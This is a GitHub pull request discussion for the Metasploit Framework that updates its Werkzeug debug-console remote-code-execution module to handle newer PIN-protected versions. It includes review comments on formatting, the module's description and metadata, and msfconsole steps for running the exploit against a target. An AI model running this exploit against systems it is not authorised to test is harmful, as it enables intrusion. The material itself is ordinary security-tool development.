-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Update werkzeug rce module #19533
base: master
Are you sure you want to change the base?
Update werkzeug rce module #19533
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Impressive documentation!
'Description' => 'This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug ' \ | ||
'is included with Flask, but not enabled by default. It is also included in other ' \ | ||
'projects, for example the RunServerPlus extension for Django. It may also be used ' \ | ||
"alone.\n\n" \ | ||
'The documentation states the following: "The debugger must never be used on production ' \ | ||
'machines. We cannot stress this enough. Do not enable the debugger in production." Of ' \ | ||
"course this doesn't prevent developers from mistakenly enabling it in production!\n\n" \ | ||
"Tested against the following Werkzeug versions:\n" \ | ||
"- 3.0.3 on Debian 12, Windows 11 and macOS 14.6\n" \ | ||
"- 1.1.4 on Debian 12\n" \ | ||
"- 1.0.1 on Debian 12\n" \ | ||
"- 0.11.5 on Debian 12\n" \ | ||
'- 0.10 on Debian 12', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No need for the \n
and \
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The new lines are required for formatting when the user
info
command is run in msfconsole
I'll update the documentation soon to include the logs that were previously verbose |
Done |
This looks really nice. Thanks for sending it to us and taking the time to integrate the updates with the existing module. |
'Arch' => ARCH_PYTHON, | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => '2015-06-28' | ||
'DisclosureDate' => 'Jun 28, 2015', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Reading this, we realized our documentation was old. Pleas leave the original date format.
Also, please run this module through Rubocop: https://docs.metasploit.com/docs/development/quality/using-rubocop.html#rubocop
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Changed the date, but haven't run it through rubocop yet.
@bwatters-r7, is there a rubocop.yml with rules in that I should use?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've run it through rubocop and it changed a bunch of things, but it also printed out an error:
An error occurred while Layout/ModuleDescriptionIndentation cop was inspecting /home/grobinson/metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb:17:2
This updates an existing module that only targeted older version of the vulnerable Werkzeug application that didn't include any authentication. The update adds support for newer versions of Werkzeug that do support authentication. The updated module supports the following authentication methods:
When generating a cookie (and PIN), there are 3 different algorithms used, depending on the target selected by the user. This is because the algorithm used to generate the cookie/PIN has changed throughout the application's development.
Verification
msfconsole
use exploit/multi/http/werkzeug_debug_rce
set RHOSTS <Iip>
set LHOST <ip>
set VHOST 127.0.0.1
set MACADDRESS <mac-address>
set MACHINEID <machine-id>
set FLASKPATH /usr/local/lib/python3.12/site-packages/flask/app.py
run
Sample vulnerable app code is included in the documentation, as well as additional verification steps, covering multiple versions of Werkzeug, and multiple exploit paths.